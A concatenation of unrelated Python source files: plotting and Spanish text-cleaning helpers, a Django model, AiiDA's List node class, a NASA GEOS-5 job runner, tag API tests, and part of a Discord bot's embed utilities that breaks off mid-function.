box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.85, box.height])
ax.set_title(self._title, {"fontsize": 15, "fontweight": 700})
ax.set_xlabel(self._label_x)
ax.set_xlim(-0.2, x[-1] + 0.2)
ax.set_xticks(self._x_limits)
if self._labels is not None:
ax.set_xticklabels(self._labels, rotation=self._rotation)
if self._legend:
ax.legend(
lines,
self._labels,
bbox_to_anchor=(1.003, 1),
loc="upper left",
markerscale=0.5,
frameon=False,
)
ax.set_ylabel(self._label_y)
ax.set_yticks(list(range(len(self.keywords))))
ax.set_yticklabels(self._keywords)
if self._outpath is not None:
plt.savefig(
self._outpath,
bbox_inches="tight",
transparent=False,
facecolor="w",
dpi=300,
)
if self._show:
plt.show()
if not self._show and self._outpath is None:
warnings.warn("Por favor fije una ruta para guardar la imagen")
plt.show()
if self._return_fig:
return fig
return ax
def limpieza_basica(texto, ignorar_mayus=True):
# Texto a minúsculas
if ignorar_mayus:
texto = texto.lower()
# Pone un espacio antes y después de cada signo de puntuación
texto = re.sub(r"([\.\",\(\)!\?;:])", " \\1 ", texto)
# Quita caracteres especiales del texto.
# RegEx adaptada de https://stackoverflow.com/a/56280214
texto = re.sub(r"[^ a-zA-ZÀ-ÖØ-öø-ÿ0-9]+", " ", texto)
# Reemplaza espacios múltiples por un solo espacio
texto = re.sub(r" +", " ", texto)
# Quitar espacios, tabs y enters en los extremos del texto
texto = texto.strip(" \t\n\r")
return texto
|
from django.db import models
# Create your models here.
class CodeProject(models.Model):
name = models.CharField(max_length=200)
description = models.TextField()
demo_link = models.CharField(max_length=300,blank=True)
repo_link = models.CharField(max_length=300,blank=True)
class Meta:
verbose_name = 'Code project'
verbose_name_plural = 'Code projects'
def __str__(self):
return self.name
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida_core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from collections import MutableSequence
from aiida.orm.data import Data
class List(Data, MutableSequence):
"""
Class to store python lists as AiiDA nodes
"""
_LIST_KEY = 'list'
def __init__(self, **kwargs):
if 'list' not in kwargs and 'dbnode' not in kwargs:
kwargs['list'] = list()
super(List, self).__init__(**kwargs)
def __getitem__(self, item):
return self.get_list()[item]
def __setitem__(self, key, value):
l = self.get_list()
l[key] = value
if not self._using_list_reference():
self.set_list(l)
def __delitem__(self, key):
l = self.get_list()
del l[key]
if not self._using_list_reference():
self.set_list(l)
def __len__(self):
return len(self.get_list())
def __str__(self):
return self.get_list().__str__()
def __eq__(self, other):
try:
return self.get_list() == other.get_list()
except AttributeError:
return self.get_list() == other
def __ne__(self, other):
return not self == other
def append(self, value):
l = self.get_list()
l.append(value)
if not self._using_list_reference():
self.set_list(l)
def extend(self, L):
l = self.get_list()
l.extend(L)
if not self._using_list_reference():
self.set_list(l)
def insert(self, i, value):
l = self.get_list()
l.insert(i, value)
if not self._using_list_reference():
self.set_list(l)
def remove(self, value):
del self[value]
def pop(self, **kwargs):
l = self.get_list()
l.pop(**kwargs)
if not self._using_list_reference():
self.set_list(l)
def index(self, value):
return self.get_list().index(value)
def count(self, value):
return self.get_list().count(value)
def sort(self, key=None, reverse=False):
l = self.get_list()
l.sort(key=key, reverse=reverse)
if not self._using_list_reference():
self.set_list(l)
def reverse(self):
l = self.get_list()
l.reverse()
if not self._using_list_reference():
self.set_list(l)
def get_list(self):
try:
return self.get_attr(self._LIST_KEY)
except AttributeError:
self.set_list(list())
return self.get_attr(self._LIST_KEY)
def set_list(self, list_):
if not isinstance(list_, list):
raise TypeError('Must supply list type')
self._set_attr(self._LIST_KEY, list_)
def _using_list_reference(self):
"""
This function tells the class if we are using a list reference. This
means that calls to self.get_list return a reference rather than a copy
of the underlying list and therefore self.set_list need not be called.
This knwoledge is essential to make sure this class is performant.
Currently the implementation assumes that if the node needs to be
stored then it is using the attributes cache which is a reference.
:return: True if using self.get_list returns a reference to the
underlying sequence. False otherwise.
:rtype: bool
"""
return not self.is_stored
|
# +-======-+
# Copyright (c) 2003-2007 United States Government as represented by
# the Admistrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# THIS OPEN SOURCE AGREEMENT ("AGREEMENT") DEFINES THE RIGHTS OF USE,
# REPRODUCTION, DISTRIBUTION, MODIFICATION AND REDISTRIBUTION OF CERTAIN
# COMPUTER SOFTWARE ORIGINALLY RELEASED BY THE UNITED STATES GOVERNMENT AS
# REPRESENTED BY THE GOVERNMENT AGENCY LISTED BELOW ("GOVERNMENT AGENCY").
# THE UNITED STATES GOVERNMENT, AS REPRESENTED BY GOVERNMENT AGENCY, IS AN
# INTENDED THIRD-PARTY BENEFICIARY OF ALL SUBSEQUENT DISTRIBUTIONS OR
# REDISTRIBUTIONS OF THE SUBJECT SOFTWARE. ANYONE WHO USES, REPRODUCES,
# DISTRIBUTES, MODIFIES OR REDISTRIBUTES THE SUBJECT SOFTWARE, AS DEFINED
# HEREIN, OR ANY PART THEREOF, IS, BY THAT ACTION, ACCEPTING IN FULL THE
# RESPONSIBILITIES AND OBLIGATIONS CONTAINED IN THIS AGREEMENT.
#
# Government Agency: National Aeronautics and Space Administration
# Government Agency Original Software Designation: GSC-15354-1
# Government Agency Original Software Title: GEOS-5 GCM Modeling Software
# User Registration Requested. Please Visit http://opensource.gsfc.nasa.gov
# Government Agency Point of Contact for Original Software:
# Dale Hithon, SRA Assistant, (301) 286-2691
#
# +-======-+
"""
This package implements the running of a segment: it runs a MAPL
application for a prescribed period of time (or the end of the
experiment, whichever is sooner.)
"""
from job import Job
class Run(Job):
def __init__(self,ConfigFile,Children=[]):
# Initialize Job specific stuff in base class
# -------------------------------------------
Job.__init__(self,ConfigFile)
self.Children = Children
# -------------------
# Per-segment Methods
# -------------------
def execute(self):
"""Executes the Application for one segment."""
self.initialize()
self.run()
self.finalize()
def initialize(self):
self._initialize()
for child in self.Children:
child.initialize()
self.initialize_()
def run(self):
self._run()
for child in self.Children:
child.run()
self.run_()
def finalize(self):
self._finalize()
for child in self.Children:
child.finalize()
self.finalize_()
# -----------------
# Per-job Methods
# -----------------
def signin(self):
self._signin()
for child in self.Children:
child.signin()
self.signin_()
def signout(self):
self._signout()
for child in self.Children:
child.signout()
self.signout_()
# ---------------------
# No-op Default Methods
# ---------------------
# No-op pre-child methods
# -----------------------
def _initialize(self): pass
def _run(self): pass
def _finalize(self): pass
def _signin(self): pass
def _signout(self): pass
# No-op post-child methods
# ------------------------
def initialize_(self): pass
def run_(self): pass
def finalize_(self): pass
def signin_(self): pass
def signout_(self): pass
|
import json
from app.utils.testing import ApiTestCase
from app.tags.models import Tag, TagTranslation
from app import db
class ReviewsApiTest(ApiTestCase):
def seed_static_data(self):
self.event1 = self.add_event(key='event1')
self.event2 = self.add_event(key='event2')
self.user1 = self.add_user('event1admin@mail.com')
self.user2 = self.add_user('event2admin@mail.com')
self.user3 = self.add_user('user@mail.com')
self.event1.add_event_role('admin', self.user1.id)
self.event2.add_event_role('admin', self.user2.id)
db.session.commit()
self.tags = [
Tag(self.event1.id),
Tag(self.event1.id),
Tag(self.event2.id)
]
db.session.add_all(self.tags)
db.session.commit()
tag_translations = [
TagTranslation(self.tags[0].id, 'en', 'English Tag 1 Event 1'),
TagTranslation(self.tags[0].id, 'fr', 'French Tag 1 Event 1'),
TagTranslation(self.tags[1].id, 'en', 'English Tag 2 Event 1'),
TagTranslation(self.tags[1].id, 'fr', 'French Tag 2 Event 1'),
TagTranslation(self.tags[2].id, 'en', 'English Tag 1 Event 2')
]
db.session.add_all(tag_translations)
db.session.commit()
self.user1_headers = self.get_auth_header_for('event1admin@mail.com')
self.user2_headers = self.get_auth_header_for('event2admin@mail.com')
self.user3_headers = self.get_auth_header_for('user@mail.com')
def test_get_tag(self):
"""Test typical get request."""
self.seed_static_data()
params = {'id': 1, 'event_id': 1}
response = self.app.get('/api/v1/tag', headers=self.user1_headers, data=params)
data = json.loads(response.data)
self.assertEqual(data['id'], 1)
self.assertEqual(data['event_id'], 1)
self.assertDictEqual(data['name'], {
'en': 'English Tag 1 Event 1',
'fr': 'French Tag 1 Event 1'
})
def test_get_event_admin(self):
"""Check a non event admin can't get a tag."""
self.seed_static_data()
params = {'id': 1, 'event_id': 1}
response = self.app.get('/api/v1/tag', headers=self.user3_headers, data=params)
self.assertEqual(response.status_code, 403)
def test_get_event_admin_correct_event(self):
"""Check that an event admin for a different event can't get a tag."""
self.seed_static_data()
params = {'id': 1, 'event_id': 1}
response = self.app.get('/api/v1/tag', headers=self.user2_headers, data=params)
self.assertEqual(response.status_code, 403)
def test_typical_post(self):
"""Test a typical post request."""
self.seed_static_data()
params = {
'event_id': 2,
'name': {
'en': 'English Tag 2 Event 2',
'fr': 'French Tag 2 Event 2',
}
}
response = self.app.post(
'/api/v1/tag',
headers=self.user2_headers,
data=json.dumps(params),
content_type='application/json')
self.assertEqual(response.status_code, 201)
data = json.loads(response.data)
new_id = data['id']
response = self.app.get('/api/v1/tag', headers=self.user2_headers, data={'id': new_id, 'event_id': 2})
data = json.loads(response.data)
self.assertEqual(data['id'], new_id)
self.assertEqual(data['event_id'], 2)
self.assertDictEqual(data['name'], {
'en': 'English Tag 2 Event 2',
'fr': 'French Tag 2 Event 2'
})
def test_post_event_admin(self):
"""Test that a non-event admin can't post a new tag."""
self.seed_static_data()
params = {
'event_id': 2,
'name': {
'en': 'English Tag 2 Event 2',
'fr': 'French Tag 2 Event 2',
}
}
# User 1 is not an event admin for event 2
response = self.app.post(
'/api/v1/tag',
headers=self.user1_headers,
data=json.dumps(params),
content_type='application/json')
self.assertEqual(response.status_code, 403)
def test_put(self):
"""Test typcial put request."""
self.seed_static_data()
params = {
'id': 2,
'event_id': 1,
'name': {
'en': 'Renamed English Name', # Rename
'zu': 'Zulu Name'
}
}
response = self.app.put(
'/api/v1/tag',
headers=self.user1_headers,
data=json.dumps(params),
content_type='application/json')
self.assertEqual(response.status_code, 200)
response = self.app.get('/api/v1/tag', headers=self.user1_headers, data={'id': 2, 'event_id': 1})
data = json.loads(response.data)
self.assertEqual(data['id'], 2)
self.assertEqual(data['event_id'], 1)
self.assertDictEqual(data['name'], {
'en': 'Renamed English Name',
'zu': 'Zulu Name'
})
def test_tag_list(self):
"""Test that a list of tags can be retrieved in the correct language."""
self.seed_static_data()
params = {
'event_id': 1,
'language': 'en'
}
response = self.app.get('/api/v1/tags', headers=self.user1_headers, data=params)
data = json.loads(response.data)
self.assertEqual(len(data), 2)
self.assertEqual(data[0]['id'], 1)
self.assertEqual(data[0]['event_id'], 1)
self.assertEqual(data[0]['name'], 'English Tag 1 Event 1')
self.assertEqual(data[1]['id'], 2)
self.assertEqual(data[1]['event_id'], 1)
self.assertEqual(data[1]['name'], 'English Tag 2 Event 1')
params = {
'event_id': 1,
'language': 'fr'
}
response = self.app.get('/api/v1/tags', headers=self.user1_headers, data=params)
data = json.loads(response.data)
self.assertEqual(len(data), 2)
self.assertEqual(data[0]['id'], 1)
self.assertEqual(data[0]['event_id'], 1)
self.assertEqual(data[0]['name'], 'French Tag 1 Event 1')
self.assertEqual(data[1]['id'], 2)
self.assertEqual(data[1]['event_id'], 1)
self.assertEqual(data[1]['name'], 'French Tag 2 Event 1')
def test_tag_list_default_language(self):
"""Test that the language defaults to English when not found."""
self.seed_static_data()
params = {
'event_id': 2,
'language': 'zu'
}
response = self.app.get('/api/v1/tags', headers=self.user2_headers, data=params)
data = json.loads(response.data)
self.assertEqual(len(data), 1)
self.assertEqual(data[0]['id'], 3)
self.assertEqual(data[0]['event_id'], 2)
self.assertEqual(data[0]['name'], 'English Tag 1 Event 2')
|
"""
This file is a part of the source code for the PygameCommunityBot.
This project has been licensed under the MIT license.
Copyright (c) 2020-present PygameCommunityDiscord
This file defines some important embed related utility functions.
"""
from __future__ import annotations
import asyncio
import datetime
import io
import json
import re
from ast import literal_eval
from collections.abc import Mapping
from typing import Union, Optional, Any
import black
import discord
from discord.embeds import EmptyEmbed
from pgbot import common
EMBED_TOP_LEVEL_ATTRIBUTES_MASK_DICT = {
"provider": None,
"type": None,
"title": None,
"description": None,
"url": None,
"color": None,
"timestamp": None,
"footer": None,
"thumbnail": None,
"image": None,
"author": None,
"fields": None,
}
EMBED_TOP_LEVEL_ATTRIBUTES_SET = {
"provider",
"type",
"title",
"description",
"url",
"color",
"timestamp",
"footer",
"thumbnail",
"image",
"author",
"fields",
}
EMBED_SYSTEM_ATTRIBUTES_MASK_DICT = {
"provider": {
"name": None,
"url": None,
},
"type": None,
"footer": {
"proxy_icon_url": None,
},
"thumbnail": {
"proxy_url": None,
"width": None,
"height": None,
},
"image": {
"proxy_url": None,
"width": None,
"height": None,
},
"author": {
"proxy_icon_url": None,
},
}
EMBED_SYSTEM_ATTRIBUTES_SET = {
"provider",
"proxy_url",
"proxy_icon_url",
"width",
"height",
"type",
}
EMBED_NON_SYSTEM_ATTRIBUTES_SET = {
"name",
"value",
"inline",
"url",
"image",
"thumbnail",
"title",
"description",
"color",
"timestamp",
"footer",
"text",
"icon_url",
"author",
"fields",
}
EMBED_ATTRIBUTES_SET = {
"provider",
"name",
"value",
"inline",
"url",
"image",
"thumbnail",
"proxy_url",
"type",
"title",
"description",
"color",
"timestamp",
"footer",
"text",
"icon_url",
"proxy_icon_url",
"author",
"fields",
}
EMBED_ATTRIBUTES_WITH_SUB_ATTRIBUTES_SET = {
"author",
"thumbnail",
"image",
"fields",
"footer",
"provider",
} # 'fields' is a special case
DEFAULT_EMBED_COLOR = 0xFFFFAA
CONDENSED_EMBED_DATA_LIST_SYNTAX = """
# Condensed embed data list syntax. String elements that are empty "" will be ignored.
# The list must contain at least one argument.
[
'author.name' or ('author.name', 'author.url') or ('author.name', 'author.url', 'author.icon_url'), # embed author
'title' or ('title', 'url') or ('title', 'url', 'thumbnail.url'), #embed title, url, thumbnail
'''desc.''' or ('''desc.''', 'image.url'), # embed description, image
0xabcdef, # or -1 for default embed color
[ # embed fields
'''
<field.name|
...field.value....
|field.inline>
''',
],
'footer.text' or ('footer.text', 'footer.icon_url'), # embed footer
datetime(year, month, day[, hour[, minute[, second[, microsecond]]]]) or '2021-04-17T17:36:00.553' # embed timestamp
]
"""
def recursive_update(
old_dict: dict,
update_dict: Mapping,
add_new_keys: bool = True,
skip_value: str = "\0",
):
"""
Update one embed dictionary with another, similar to dict.update(),
But recursively update dictionary values that are dictionaries as well.
based on the answers in
https://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth
"""
for k, v in update_dict.items():
if isinstance(v, Mapping):
new_value = recursive_update(
old_dict.get(k, {}), v, add_new_keys=add_new_keys, skip_value=skip_value
)
if new_value != skip_value:
if k not in old_dict:
if not add_new_keys:
continue
old_dict[k] = new_value
else:
if v != skip_value:
if k not in old_dict:
if not add_new_keys:
continue
old_dict[k] = v
return old_dict
def recursive_delete(
old_dict: dict,
update_dict: Optional[Mapping],
skip_value: str = "\0",
inverse: bool = False,
):
"""
Delete embed dictionary attributes present in another,
But recursively do the same dictionary values that are dictionaries as well.
based on the answers in
https://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth
"""
if inverse:
for k, v in tuple(old_dict.items()):
if isinstance(v, Mapping):
lower_update_dict = None
if isinstance(update_dict, dict):
lower_update_dict = update_dict.get(k, {})
new_value = recursive_delete(
v, lower_update_dict, skip_value=skip_value, inverse=inverse
)
if (
new_value != skip_value
and isinstance(update_dict, dict)
and k not in update_dict
):
old_dict[k] = new_value
if not new_value:
del old_dict[k]
else:
if (
v != skip_value
and isinstance(update_dict, dict)
and k not in update_dict
):
del old_dict[k]
else:
for k, v in update_dict.items():
if isinstance(v, Mapping):
new_value = recursive_delete(
old_dict.get(k, {}), v, skip_value=skip_value
)
if new_value != skip_value and k in old_dict:
old_dict[k] = new_value
if not new_value:
del old_dict[k]
else:
if v != skip_value and k in old_dict:
del old_dict[k]
return old_dict
def create_embed_mask_dict(
attributes: str = "",
allow_system_attributes: bool = False,
fields_as_field_dict: bool = False,
):
embed_top_level_attrib_dict = EMBED_TOP_LEVEL_ATTRIBUTES_MASK_DICT
embed_top_level_attrib_dict = {
k: embed_top_level_attrib_dict[k].copy()
if isinstance(embed_top_level_attrib_dict[k], dict)
else embed_top_level_attrib_dict[k]
for k in embed_top_level_attrib_dict
}
system_attribs_dict = EMBED_SYSTEM_ATTRIBUTES_MASK_DICT
system_attribs_dict = {
k: system_attribs_dict[k].copy()
if isinstance(system_attribs_dict[k], dict)
else system_attribs_dict[k]
for k in system_attribs_dict
}
all_system_attribs_set = EMBED_SYSTEM_ATTRIBUTES_SET
embed_mask_dict = {}
attribs = attributes
attribs_tuple = tuple(
attr_str.split(sep=".") if "." in attr_str else attr_str
for attr_str in attribs.split()
)
all_attribs_set = EMBED_ATTRIBUTES_SET | set(str(i) for i in range(25))
attribs_with_sub_attribs = EMBED_ATTRIBUTES_WITH_SUB_ATTRIBUTES_SET
for attr in attribs_tuple:
if isinstance(attr, list):
if len(attr) > 3:
raise ValueError(
"Invalid embed attribute filter string!"
" Sub-attributes do not propagate beyond 3 levels.",
)
bottom_dict = {}
for i in range(len(attr)):
if attr[i] not in all_attribs_set:
if i == 1:
if (
attr[i - 1] == "fields"
and "(" not in attr[i]
and ")" not in attr[i]
):
raise ValueError(
f"`{attr[i]}` is not a valid embed (sub-)attribute name!",
)
else:
raise ValueError(
f"`{attr[i]}` is not a valid embed (sub-)attribute name!",
)
elif attr[i] in all_system_attribs_set and not allow_system_attributes:
raise ValueError(
f"The given attribute `{attr[i]}` cannot be retrieved when `system_attributes=`"
" is set to `False`.",
)
if not i:
if attribs_tuple.count(attr[i]):
raise ValueError(
"Invalid embed attribute filter string!"
f" Top level embed attribute `{attr[i]}` conflicts with its"
" preceding instances.",
)
elif attr[i] not in attribs_with_sub_attribs:
raise ValueError(
"Invalid embed attribute filter string!"
f" The embed attribute `{attr[i]}` does not have any sub-attributes!",
)
if attr[i] not in embed_mask_dict:
embed_mask_dict[attr[i]] = bottom_dict
else:
bottom_dict = embed_mask_dict[attr[i]]
elif i == 1 and attr[i - 1] == "fields" and not attr[i].isnumeric():
if attr[i].startswith("(") and attr[i].endswith(")"):
if not attr[i].startswith("(") and not attr[i].endswith(")"):
raise ValueError(
"Invalid embed attribute filter string!"
" Embed field ranges should only contain integers"
" and should be structured like this: "
"`fields.(start, stop[, step]).attribute`",
)
field_str_range_list = [v for v in attr[i][1:][:-1].split(",")]
field_range_list = []
for j in range(len(field_str_range_list)):
if (
field_str_range_list[j].isnumeric()
or len(field_str_range_list[j]) > 1
and field_str_range_list[j][1:].isnumeric()
):
field_range_list.append(int(field_str_range_list[j]))
else:
raise ValueError(
"Invalid embed attribute filter string!"
" Embed field ranges should only contain integers"
" and should be structured like this: "
"`fields.(start, stop[, step]).attribute`",
)
sub_attrs = []
if attr[i] == attr[-1]:
sub_attrs.extend(("name", "value", "inline"))
elif attr[-1] in ("name", "value", "inline"):
sub_attrs.append(attr[-1])
else:
raise ValueError(
f"`{attr[-1]}` is not a valid embed (sub-)attribute name!",
)
field_range = range(*field_range_list)
if not field_range:
raise ValueError(
"Invalid embed attribute filter string!"
" Empty field range!",
)
for j in range(*field_range_list):
str_idx = str(j)
if str_idx not in embed_mask_dict["fields"]:
embed_mask_dict["fields"][str_idx] = {
sub_attr: None for sub_attr in sub_attrs
}
else:
for sub_attr in sub_attrs:
embed_mask_dict["fields"][str_idx][sub_attr] = None
break
elif attr[i] in ("name", "value", "inline"):
for sub_attr in ("name", "value", "inline"):
if attr[i] == sub_attr:
for j in range(25):
str_idx = str(j)
if str_idx not in embed_mask_dict["fields"]:
embed_mask_dict["fields"][str_idx] = {
sub_attr: None
}
else:
embed_mask_dict["fields"][str_idx][
sub_attr
] = None
break
else:
raise ValueError(
"Invalid embed attribute filter string!"
f" The given attribute `{attr[i]}` is not an attribute of an embed field!",
)
break
else:
raise ValueError(
"Invalid embed attribute filter string!"
" Embed field attibutes must be either structutred like"
" `fields.0`, `fields.0.attribute`, `fields.attribute` or"
" `fields.(start,stop[,step]).attribute`. Note that embed"
" field ranges cannot contain whitespace.",
)
elif i == len(attr) - 1:
if attr[i] not in bottom_dict:
bottom_dict[attr[i]] = None
else:
if attr[i] not in embed_mask_dict[attr[i - 1]]:
bottom_dict = {}
embed_mask_dict[attr[i - 1]][attr[i]] = bottom_dict
else:
bottom_dict = embed_mask_dict[attr[i - 1]][attr[i]]
elif attr in embed_top_level_attrib_dict:
if attribs_tuple.count(attr) > 1:
raise ValueError(
"Invalid embed attribute filter string!"
" Do not specify top level embed attributes"
f" twice when not using the `.` operator: `{attr}`",
)
elif attr in all_system_attribs_set and not allow_system_attributes:
raise ValueError(
f"The given attribute `{attr}` cannot be retrieved when `system_attributes=`"
" is set to `False`.",
)
if attr not in embed_mask_dict:
embed_mask_dict[attr] = None
else:
raise ValueError(
"Invalid embed attribute filter string!"
" Do not specify upper level embed attributes twice!",
)
else:
raise ValueError(
f"Invalid top level embed attribute name `{attr}`!",
)
if not fields_as_field_dict and "fields" in embed_mask_dict:
embed_mask_dict["fields"] = [
embed_mask_dict["fields"][i]
for i in sorted(embed_mask_dict["fields"].keys())
]
return embed_mask_dict
def copy_embed(embed: discord.Embed):
return discord.Embed.from_dict(embed.to_dict())
def handle_embed_dict_timestamp(embed_dict: dict):
if "timestamp" in embed_dict:
if isinstance(embed_dict["timestamp"], str):
try:
final_timestamp = (
embed_dict["timestamp"][:-1]
if embed_dict["timestamp"].endswith("Z")
else embed_dict["timestamp"]
)
datetime.datetime.fromisoformat(final_timestamp)
embed_dict["timestamp"] = final_timestamp
except ValueError:
del embed_dict["timestamp"]
elif isinstance(embed_dict["timestamp"], datetime.datetime):
embed_dict["timestamp"] = embed_dict["timestamp"].isoformat()
else:
del embed_dict["timestamp"]
return embed_dict
def copy_embed_dict(embed_dict: dict):
# prevents shared reference bugs to attributes shared by the outputs of discord.Embed.to_dict()
copied_embed_dict = {
k: embed_dict[k].copy() if isinstance(embed_dict[k], dict) else embed_dict[k]
for k in embed_dict
}
if "fields" in embed_dict:
copied_embed_dict["fields"] = [
field_dict.copy() for field_dict in embed_dict["fields"]
]
return copied_embed_dict
def get_fields(*strings: str):
"""
Get a list of fields from messages.
Syntax of an embed field string: <name|value[|inline]>
Args:
*strings (str): The messages to get the fields from
Returns:
list[list[str, str, bool]]: The list of fields. if only one message is given as input, then only one field is returned.
"""
# syntax: <Title|desc.[|inline=False]>
field_regex = r"(<.*\|.*(\|True|\|False|\|1|\|0|)>)"
field_datas = []
true_bool_strings = ("", "True", "1")
for string in strings:
field_list = re.split(field_regex, string)
for field in field_list:
if field:
field = field.strip()[1:-1] # remove < and >
field_data: list[Any] = field.split("|")
if len(field_data) not in (2, 3):
continue
elif len(field_data) == 2:
field_data.append("")
field_data[2] = True if field_data[2] in true_bool_strings else False
field_datas.append(field_data)
return field_datas
class PagedEmbed:
def __init__(
self,
message: discord.Message,
pages: list[discord.Embed],
caller: Optional[discord.Member] = None,
command: Optional[str] = None,
start_page: int = 0,
):
"""
Create an embed which can be controlled by reactions. The footer of the
embeds will be overwritten. If the optional "command" argument
is set the embed page will be refreshable. The pages argument must
have at least one embed.
Args:
message (discord.Message): The message to overwrite. For commands,
it would be self.response_msg
pages (list[discord.Embed]): The list of embeds to change
pages between
caller (Optional[discord.Member]): The user that can control
the embed. Defaults to None (everyone can control it).
command (Optional[str]): Optional argument to support pg!refresh.
Defaults to None.
start_page (int): The page to start from. Defaults to 0.
"""
self.pages = pages
self.current_page = start_page
self.message = message
self.parent_command = command
self.is_on_info = False
self.control_emojis = {
"first": ("", ""),
"prev": ("◀️", "Go to the previous page"),
"stop": ("⏹️", "Deactivate the buttons"),
"info": ("ℹ️", "Show this information page"),
"next": ("▶️", "Go to the next page"),
"last": ("", ""),
}
if len(self.pages) >= 3:
self.control_emojis["first"] = ("⏪", "Go to the first page")
self.control_emojis["last"] = ("⏩", "Go to the last page")
self.killed = False
self.caller = caller
self.help_text = ""
for emoji, desc in self.control_emojis.values():
if emoji:
self.help_text += f"{emoji}: {desc}\n"
async def add_control_emojis(self):
"""Add the control reactions to the message."""
for emoji in self.control_emojis.values():
if emoji[0]:
await self.message.add_reaction(emoji[0])
async def handle_reaction(self, reaction: str):
"""Handle a reaction."""
if reaction == self.control_emojis.get("next")[0]:
await self.set_page(self.current_page + 1)
if reaction == self.control_emojis.get("prev")[0]:
await self.set_page(self.current_page - 1)
if reaction == self.control_emojis.get("first")[0]:
await self.set_page(0)
if reaction == self.control_emojis.get("last")[0]:
await self.set_page(len(self.pages) - 1)
if reaction == self.control_emojis.get("stop")[0]:
self.killed = True
if reaction == self.control_emojis.get("info")[0]:
await self.show_info_page()
async def show_info_page(self):
"""Create and show the info page."""
self.is_on_info = not self.is_on_info
if self.is_on_info:
info_page_embed = create(description=self.help_text)
footer = self.get_footer_text(self.current_page)
info_page_embed.set_footer(text=footer)
await self.message.edit(embed=info_page_embed)
else:
await self.message.edit(embed=self.pages[self.current_page])
async def set_page(self, num: int):
"""Set the current page and display it."""
self.is_on_info = False
self.current_page = num % len(self.pages)
await self.message.edit(embed=self.pages[self.current_page])
async def setup(self):
if not self.pages:
await replace(
self.message,
title="Internal error occured!",
description="Got empty embed list for PagedEmbed",
color=0xFF0000,
)
return False
if len(self.pages) == 1:
await self.message.edit(embed=self.pages[0])
return False
for i, page in enumerate(self.pages):
footer = self.get_footer_text(i)
page.set_footer(text=footer)
await self.message.edit(embed=self.pages[self.current_page])
await self.add_control_emojis()
return True
def get_footer_text(self, page_num: int):
"""Get the information footer text, which contains the current page."""
footer = f"Page {page_num + 1} of {len(self.pages)}.\n"
if self.parent_command:
footer += "Refresh by replying to this message with `pg!refresh`\n"
footer += f"Command: {self.parent_command}"
return footer
async def check(self, event):
"""Check if the event from "raw_reaction_add" can be passed down to `handle_rection`"""
if event.member.bot:
return False
await self.message.remove_reaction(str(event.emoji), event.member)
if self.caller and self.caller.id != event.user_id:
for role in event.member.roles:
if not common.GENERIC and role.id in common.ServerConstants.ADMIN_ROLES:
break
else:
return False
return event.message_id == self.message.id
async def mainloop(self):
"""Start the mainloop. This checks for reactions and handles them."""
if not await self.setup():
return
while not self.killed:
try:
event = await common.bot.wait_for("raw_reaction_add", timeout=60)
if await self.check(event):
await self.handle_reaction(str(event.emoji))
except asyncio.TimeoutError:
self.killed = True
await self.message.clear_reactions()
def parse_condensed_embed_list(embed_list: Union[list, tuple]):
"""
Parse the condensed embed list syntax used in some embed creation
comnands. The syntax is:
[
'author.name' or ('author.name', 'author.url') or ('author.name', 'author.url', 'icon.url'), # embed author
'title' or ('title', 'url') or ('title', 'url', 'thumbnail.url'), #embed title, url, thumbnail
'''desc.''' or ('''desc.''', 'image.url'), # embed description, image
0xabcdef, # or -1 for default embed color
[ # embed fields
'''
<field.name|
...field.value....
|field.inline>
''',
],
'footer.text' or ('footer.text', 'footer.icon_url'), # embed footer
datetime(year, month, day[, hour[, minute[, second[, microsecond]]]]) or '2021-04-17T17:36:00.553' # embed timestamp
]
The list must contain at least 1 element.
"""
arg_count = len(embed_list)
embed_args = {}
if arg_count > 0:
if isinstance(embed_list[0], (tuple, list)):
if len(embed_list[0]) == 3:
embed_args.update(
author_name=embed_list[0][0] + "",
author_url=embed_list[0][0] + "",
author_icon_url=embed_list[0][2] + "",
)
elif len(embed_list[0]) == 2:
embed_args.update(
author_name=embed_list[0][0] + "",
author_url=embed_list[0][1] + "",
)
elif len(embed_list[0]) == 1:
embed_args.update(
author_name=embed_list[0][0] + "",
)
else:
embed_args.update(
author_name=embed_list[0] + "",
)
else:
raise ValueError(
f"Invalid arguments! The condensed embed syntax is: ```\n{CONDENSED_EMBED_DATA_LIST_SYNTAX}\n```"
)
if arg_count > 1:
if isinstance(embed_list[1], (tuple, list)):
if len(embed_list[1]) == 3:
embed_args.update(
title=embed_list[1][0] + "",
url=embed_list[1][1] + "",
thumbnail_url=embed_list[1][2] + "",
)
elif len(embed_list[1]) == 2:
embed_args.update(
title=embed_list[1][0] + "",
url=embed_list[1][1] + "",
)
elif len(embed_list[1]) == 1:
embed_args.update(
title=embed_list[1][0] + "",
)
else:
embed_args.update(
title=embed_list[1] + "",
)
if arg_count > 2:
if isinstance(embed_list[2], (tuple, list)):
if len(embed_list[2]) == 2:
embed_args.update(
description=embed_list[2][0] + "",
image_url=embed_list[2][1] + "",
)
elif len(embed_list[2]) == 1:
embed_args.update(
description=embed_list[2][0] + "",
)
else:
embed_args.update(
description=embed_list[2] + "",
)
if arg_count > 3:
if embed_list[3] > -1:
embed_args.update(
color=embed_list[3] + 0,
)
if arg_count > 4:
try:
fields = get_fields(*embed_list[4])
embed_args.update(fields=fields)
except TypeError:
raise ValueError(
"Invalid format for field string(s) in the condensed embed syntax!"
'The format should be `"<name|value|inline>"`'
)
if arg_count > 5:
if isinstance(embed_list[5], (tuple, list)):
if len(embed_list[5]) == 2:
embed_args.update(
footer_text=embed_list[5][0] + "",
footer_icon_url=embed_list[5][1] + "",
)
elif len(embed_list[5]) == 1:
embed_args.update(
footer_text=embed_list[5][0] + "",
)
else:
embed_args.update(
footer_text=embed_list[5] + "",
)
if arg_count > 6:
embed_args.update(timestamp=embed_list[6] + "")
return embed_args
def create_as_dict(
author_name=EmptyEmbed,
author_url=EmptyEmbed,
author_icon_url=EmptyEmbed,
title=EmptyEmbed,
url=EmptyEmbed,
thumbnail_url=EmptyEmbed,
description=EmptyEmbed,
image_url=EmptyEmbed,
color=-1,
fields=(),
footer_text=EmptyEmbed,
